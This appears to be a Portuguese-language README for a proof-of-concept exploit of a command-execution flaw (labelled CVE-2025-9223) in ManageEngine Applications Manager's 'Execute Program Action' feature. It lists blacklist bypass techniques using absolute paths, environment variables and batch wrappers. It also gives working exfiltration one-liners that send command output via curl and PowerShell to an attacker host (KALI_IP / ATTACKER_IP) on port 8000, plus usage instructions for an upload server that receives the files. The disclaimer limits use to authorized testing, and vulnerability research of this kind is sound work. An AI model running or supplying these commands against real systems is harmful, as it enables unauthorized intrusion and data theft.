
Prova de Conceito CVE-2025-9223
Este repositório contém uma Prova de Conceito (PoC) que demonstra uma vulnerabilidade de execução de comandos na função "Execute Program Action" do ManageEngine Applications Manager.
O Applications Manager utiliza uma lista negra (BlackListCommands) para bloquear comandos perigosos, mas a validação possui falhas críticas:
| Método | Exemplo |
|---|---|
| Caminho Absoluto | C:\Windows\System32\netstat.exe |
| Variáveis de Ambiente | %SystemRoot%\System32\netstat.exe |
| Script Wrapper | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
O script upload_server.py fornece um servidor HTTP simples para receber arquivos exfiltrados.
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host: Endereço de vinculação (padrão: 0.0.0.0)--port: Porta HTTP (padrão: 8000)--dir: Diretório de saída (padrão: diretório atual)| Método | Endpoint | Descrição |
|---|---|---|
| GET | / | Lista arquivos enviados recentemente |
| POST | /upload | Envia arquivos (multipart/form-data) |
| PUT | /upload/[filename] | Upload direto de arquivos |
✅ Proteção contra path traversal
✅ Nomes de arquivo únicos com timestamp
✅ Registro de requisições com IP e User-Agent
✅ Validação de tipo de conteúdo
Crie um arquivo test_commands.txt com exemplos de bypass:
# Bypass con ruta absoluta
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# Bypass con variables de entorno
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# Ejemplos de exfiltración de datos
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
IMPORTANTE: Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados.
❌ NÃO usar em sistemas que não possua ou não tenha permissão explícita para testar
❌ NÃO usar para nenhuma atividade ilegal
✅ SIM usar apenas em ambientes controlados para pesquisa de segurança
✅ SIM obter autorização adequada antes de realizar testes
O autor não é responsável por qualquer uso indevido desta ferramenta. Os usuários assumem toda a responsabilidade e risco.
Este projeto é apenas para fins de pesquisa e educacionais. Todos os direitos reservados.
Johan Aybar - Para fins educacionais
⚠️ LEMBRETE: Este PoC deve ser usado apenas em ambientes de teste autorizados. O uso não autorizado pode ser ilegal e é estritamente proibido.